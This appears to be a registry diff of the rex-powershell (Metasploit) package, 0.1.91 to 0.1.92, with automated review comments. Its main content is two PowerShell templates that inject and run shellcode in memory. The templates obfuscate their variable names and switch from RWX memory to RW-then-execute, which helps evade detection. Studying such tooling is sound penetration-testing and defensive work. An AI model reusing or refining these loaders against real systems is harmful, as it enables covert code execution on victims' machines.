rex-powershell 0.1.91 → 0.1.92
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +0 -0
- data/.github/workflows/verify.yml +57 -0
- data/data/templates/to_mem_dotnet.ps1.template +10 -5
- data/data/templates/to_mem_pshreflection.ps1.template +17 -15
- data/lib/rex/powershell/payload.rb +2 -3
- data/lib/rex/powershell/version.rb +1 -1
- metadata +3 -2
- metadata.gz.sig +0 -0
    
        checksums.yaml
    CHANGED
    
    | @@ -1,7 +1,7 @@ | |
| 1 1 | 
             
            ---
         | 
| 2 2 | 
             
            SHA256:
         | 
| 3 | 
            -
              metadata.gz:  | 
| 4 | 
            -
              data.tar.gz:  | 
| 3 | 
            +
              metadata.gz: 546de61fbb5ce6c1291c1c922c68db93a408ae3c1fc339acdabc80d2b905f961
         | 
| 4 | 
            +
              data.tar.gz: ac1f52f00b5df0ffd34813e5aed34a61ee52da12269173f5a6ff792a01f3c336
         | 
| 5 5 | 
             
            SHA512:
         | 
| 6 | 
            -
              metadata.gz:  | 
| 7 | 
            -
              data.tar.gz:  | 
| 6 | 
            +
              metadata.gz: ce407f2b61f7ccecdfc42ce1bf797e68d2ef3b7a88717735da432e92d9cff2c9511b8a1a0639bf987140076da7a0ccd141f2e5588252c11058d49467b033467e
         | 
| 7 | 
            +
              data.tar.gz: efd9530029b6909fa9c7fe9daff2e59ce5167dbf5b25cb3cf67f816aa5528a7589c4b462516d823d429ce508e74cb6aa3be329157ee95eed1a1269b5bd743bd0
         | 
    
        checksums.yaml.gz.sig
    CHANGED
    
    | Binary file | 
    
        data.tar.gz.sig
    CHANGED
    
    | Binary file | 
| @@ -0,0 +1,57 @@ | |
| 1 | 
            +
            name: Verify
         | 
| 2 | 
            +
             | 
| 3 | 
            +
            on:
         | 
| 4 | 
            +
              push:
         | 
| 5 | 
            +
                branches:
         | 
| 6 | 
            +
                  - '*'
         | 
| 7 | 
            +
              pull_request:
         | 
| 8 | 
            +
                branches:
         | 
| 9 | 
            +
                  - '*'
         | 
| 10 | 
            +
             | 
| 11 | 
            +
            jobs:
         | 
| 12 | 
            +
              test:
         | 
| 13 | 
            +
                runs-on: ubuntu-18.04
         | 
| 14 | 
            +
                timeout-minutes: 40
         | 
| 15 | 
            +
             | 
| 16 | 
            +
                strategy:
         | 
| 17 | 
            +
                  fail-fast: true
         | 
| 18 | 
            +
                  matrix:
         | 
| 19 | 
            +
                    ruby:
         | 
| 20 | 
            +
                      - 2.5
         | 
| 21 | 
            +
                      - 2.6
         | 
| 22 | 
            +
                      - 2.7
         | 
| 23 | 
            +
                      - 3.0
         | 
| 24 | 
            +
                    test_cmd:
         | 
| 25 | 
            +
                      - bundle exec rspec
         | 
| 26 | 
            +
             | 
| 27 | 
            +
                env:
         | 
| 28 | 
            +
                  RAILS_ENV: test
         | 
| 29 | 
            +
             | 
| 30 | 
            +
                name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
         | 
| 31 | 
            +
                steps:
         | 
| 32 | 
            +
                  - name: Checkout code
         | 
| 33 | 
            +
                    uses: actions/checkout@v2
         | 
| 34 | 
            +
             | 
| 35 | 
            +
                  - uses: actions/setup-ruby@v1
         | 
| 36 | 
            +
                    with:
         | 
| 37 | 
            +
                      ruby-version: ${{ matrix.ruby }}
         | 
| 38 | 
            +
             | 
| 39 | 
            +
                  - name: Setup bundler
         | 
| 40 | 
            +
                    run: |
         | 
| 41 | 
            +
                      gem install bundler
         | 
| 42 | 
            +
                  - uses: actions/cache@v2
         | 
| 43 | 
            +
                    with:
         | 
| 44 | 
            +
                      path: vendor/bundle
         | 
| 45 | 
            +
                      key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
         | 
| 46 | 
            +
                      restore-keys: |
         | 
| 47 | 
            +
                        ${{ runner.os }}-gems-
         | 
| 48 | 
            +
                  - name: Bundle install
         | 
| 49 | 
            +
                    run: |
         | 
| 50 | 
            +
                      bundle config path vendor/bundle
         | 
| 51 | 
            +
                      bundle install --jobs 4 --retry 3
         | 
| 52 | 
            +
                  - name: ${{ matrix.test_cmd }}
         | 
| 53 | 
            +
                    run: |
         | 
| 54 | 
            +
                      echo "${CMD}"
         | 
| 55 | 
            +
                      bash -c "${CMD}"
         | 
| 56 | 
            +
                    env:
         | 
| 57 | 
            +
                      CMD: ${{ matrix.test_cmd }}
         | 
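Review bot: The Ruby matrix entries at lines 20–23 are unquoted numbers, so `- 3.0` reaches the loader as the float 3 (rendered "3") and the setup action will presumably resolve it to the newest 3.x rather than Ruby 3.0; quote every entry, `- "2.5"` through `- "3.0"`, as the other three only survive by accident. The three actions are referenced by mutable tags (`actions/checkout@v2`, `actions/setup-ruby@v1`, `actions/cache@v2`) in a workflow that runs on every push and pull request, so pinning each to a full commit SHA with a version comment is the usual supply-chain hardening, and `actions/setup-ruby` is archived upstream in favour of `ruby/setup-ruby`. There is also no top-level `permissions:` block, so the job inherits the repository's default `GITHUB_TOKEN` scope; `permissions:` / `  contents: read` is all that checkout, cache and rspec need. `runs-on: ubuntu-18.04` names a runner image that GitHub has since retired, so the workflow will stop scheduling without a further change.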
| @@ -5,9 +5,10 @@ $%{var_syscode} = @" | |
| 5 5 | 
             
            	namespace %{var_kernel32} {
         | 
| 6 6 | 
             
            		public class func {
         | 
| 7 7 | 
             
            			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
         | 
| 8 | 
            -
            			[Flags] public enum MemoryProtection {  | 
| 8 | 
            +
            			[Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
         | 
| 9 9 | 
             
            			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
         | 
| 10 10 | 
             
            			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
         | 
| 11 | 
            +
            			[DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
         | 
| 11 12 | 
             
            			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
         | 
| 12 13 | 
             
            			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
         | 
| 13 14 | 
             
            		}
         | 
| @@ -21,10 +22,14 @@ $%{var_compileParams}.GenerateInMemory = $True | |
| 21 22 | 
             
            $%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
         | 
| 22 23 |  | 
| 23 24 | 
             
            [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
         | 
| 25 | 
            +
            [Uint32]$%{var_opf} = 0
         | 
| 24 26 |  | 
| 25 | 
            -
            $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]:: | 
| 27 | 
            +
            $%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ReadWrite)
         | 
| 26 28 | 
             
            if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
         | 
| 27 29 | 
             
            [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
         | 
| 28 | 
            -
             | 
| 29 | 
            -
            if ([ | 
| 30 | 
            -
            $%{ | 
| 30 | 
            +
             | 
| 31 | 
            +
            if ([%{var_kernel32}.func]::VirtualProtect($%{var_baseaddr},[Uint32]$%{var_code}.Length + 1, [%{var_kernel32}.func+MemoryProtection]::Execute, [Ref]$%{var_opf}) -eq $true ) {
         | 
| 32 | 
            +
            	[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
         | 
| 33 | 
            +
            	if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
         | 
| 34 | 
            +
            	$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
         | 
| 35 | 
            +
            }
         | 
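Review bot: The new `VirtualProtect` declaration at line 11 types its arguments as `int dwSize, int flNewProtect, out int lpflOldProtect`, while the call at line 31 passes `[Uint32]$%{var_code}.Length + 1` and a `[Ref]` to the `[Uint32]`-constrained `$%{var_opf}` declared at line 25, and the neighbouring `VirtualAlloc` declaration uses `uint` for the same kinds of values; `uint dwSize, uint flNewProtect, out uint lpflOldProtect` would make the three agree (PowerShell's binder presumably converts either way, so this is a consistency point rather than an observed failure). The enum member `Execute= 0x10` at line 8 is missing the space before `=` that `ReadWrite = 0x04` on the same line has. The `$%{var_syscode}` here-string that these lines belong to opens before the first hunk, and the compile section between the two hunks is not shown.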
| @@ -1,27 +1,29 @@ | |
| 1 1 | 
             
            function %{func_get_proc_address} {
         | 
| 2 | 
            -
             | 
| 3 | 
            -
             | 
| 2 | 
            +
                    Param ($%{var_module}, $%{var_procedure})
         | 
| 3 | 
            +
                    $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
         | 
| 4 4 |  | 
| 5 | 
            -
             | 
| 5 | 
            +
                    return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
         | 
| 6 6 | 
             
            }
         | 
| 7 7 |  | 
| 8 8 | 
             
            function %{func_get_delegate_type} {
         | 
| 9 | 
            -
             | 
| 10 | 
            -
             | 
| 11 | 
            -
             | 
| 12 | 
            -
             | 
| 9 | 
            +
                    Param (
         | 
| 10 | 
            +
                            [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
         | 
| 11 | 
            +
                            [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
         | 
| 12 | 
            +
                    )
         | 
| 13 13 |  | 
| 14 | 
            -
             | 
| 15 | 
            -
             | 
| 16 | 
            -
             | 
| 14 | 
            +
                    $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
         | 
| 15 | 
            +
                    $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
         | 
| 16 | 
            +
                    $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
         | 
| 17 17 |  | 
| 18 | 
            -
             | 
| 18 | 
            +
                    return $%{var_type_builder}.CreateType()
         | 
| 19 19 | 
             
            }
         | 
| 20 20 |  | 
| 21 21 | 
             
            [Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
         | 
| 22 | 
            +
            [Uint32]$%{var_opf} = 0
         | 
| 23 | 
            +
            $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x04)
         | 
| 22 24 |  | 
| 23 | 
            -
            $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
         | 
| 24 25 | 
             
            [System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
         | 
| 25 | 
            -
             | 
| 26 | 
            -
            $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
         | 
| 27 | 
            -
            [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
         | 
| 26 | 
            +
            if (([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualProtect), (%{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))).Invoke($%{var_buffer}, [Uint32]$%{var_code}.Length, 0x10, [Ref]$%{var_opf})) -eq $true) {
         | 
| 27 | 
            +
                    $%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
         | 
| 28 | 
            +
                    [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
         | 
| 29 | 
            +
            }
         | 
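Review bot: The `VirtualAlloc` call at line 23 and the new `VirtualProtect` call at line 26 use bare literals (`0x3000`, `0x04`, `0x10`) where the sibling dotnet template names the same values through an enum, so a reader has to know the Win32 constants by heart; a trailing comment on each call, `# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x04 = PAGE_READWRITE` and `# 0x10 = PAGE_EXECUTE`, documents the intent at no cost. The delegate at line 26 declares its second parameter as `[UIntPtr]` but is invoked with `[Uint32]$%{var_code}.Length`, relying on PowerShell's implicit conversion; either cast at the call site to `[UIntPtr]` or declare the parameter `[UInt32]` as the `VirtualAlloc` delegate on line 23 does, so the declared and passed types match. The `-eq $true` on a `[Bool]` return is redundant; `if ((...).Invoke(...)) {` reads the same.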
| @@ -37,10 +37,10 @@ module Payload | |
| 37 37 | 
             
              def self.to_win32pe_psh(template_path = TEMPLATE_DIR, code)
         | 
| 38 38 | 
             
                hash_sub = {}
         | 
| 39 39 | 
             
                hash_sub[:var_code] 		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 40 | 
            -
                hash_sub[:var_win32_func] | 
| 40 | 
            +
                hash_sub[:var_win32_func]		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 41 41 | 
             
                hash_sub[:var_payload] 		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 42 42 | 
             
                hash_sub[:var_size] 		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 43 | 
            -
                hash_sub[:var_rwx] | 
| 43 | 
            +
                hash_sub[:var_rwx]			= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 44 44 | 
             
                hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 45 45 | 
             
                hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
         | 
| 46 46 |  | 
| @@ -55,7 +55,6 @@ module Payload | |
| 55 55 | 
             
              # Originally from PowerSploit
         | 
| 56 56 | 
             
              #
         | 
| 57 57 | 
             
              def self.to_win32pe_psh_reflection(template_path = TEMPLATE_DIR, code)
         | 
| 58 | 
            -
                # Intialize rig and value names
         | 
| 59 58 | 
             
                rig = Rex::RandomIdentifier::Generator.new(DEFAULT_RIG_OPTS)
         | 
| 60 59 | 
             
                rig.init_var(:func_get_proc_address)
         | 
| 61 60 | 
             
                rig.init_var(:func_get_delegate_type)
         | 
    
        metadata
    CHANGED
    
    | @@ -1,7 +1,7 @@ | |
| 1 1 | 
             
            --- !ruby/object:Gem::Specification
         | 
| 2 2 | 
             
            name: rex-powershell
         | 
| 3 3 | 
             
            version: !ruby/object:Gem::Version
         | 
| 4 | 
            -
              version: 0.1. | 
| 4 | 
            +
              version: 0.1.92
         | 
| 5 5 | 
             
            platform: ruby
         | 
| 6 6 | 
             
            authors:
         | 
| 7 7 | 
             
            - Metasploit Hackers
         | 
| @@ -93,7 +93,7 @@ cert_chain: | |
| 93 93 | 
             
              EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
         | 
| 94 94 | 
             
              9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
         | 
| 95 95 | 
             
              -----END CERTIFICATE-----
         | 
| 96 | 
            -
            date: 2021-07- | 
| 96 | 
            +
            date: 2021-07-19 00:00:00.000000000 Z
         | 
| 97 97 | 
             
            dependencies:
         | 
| 98 98 | 
             
            - !ruby/object:Gem::Dependency
         | 
| 99 99 | 
             
              name: rake
         | 
| @@ -173,6 +173,7 @@ executables: [] | |
| 173 173 | 
             
            extensions: []
         | 
| 174 174 | 
             
            extra_rdoc_files: []
         | 
| 175 175 | 
             
            files:
         | 
| 176 | 
            +
            - ".github/workflows/verify.yml"
         | 
| 176 177 | 
             
            - ".gitignore"
         | 
| 177 178 | 
             
            - ".rspec"
         | 
| 178 179 | 
             
            - ".travis.yml"
         | 
    
        metadata.gz.sig
    CHANGED
    
    | Binary file |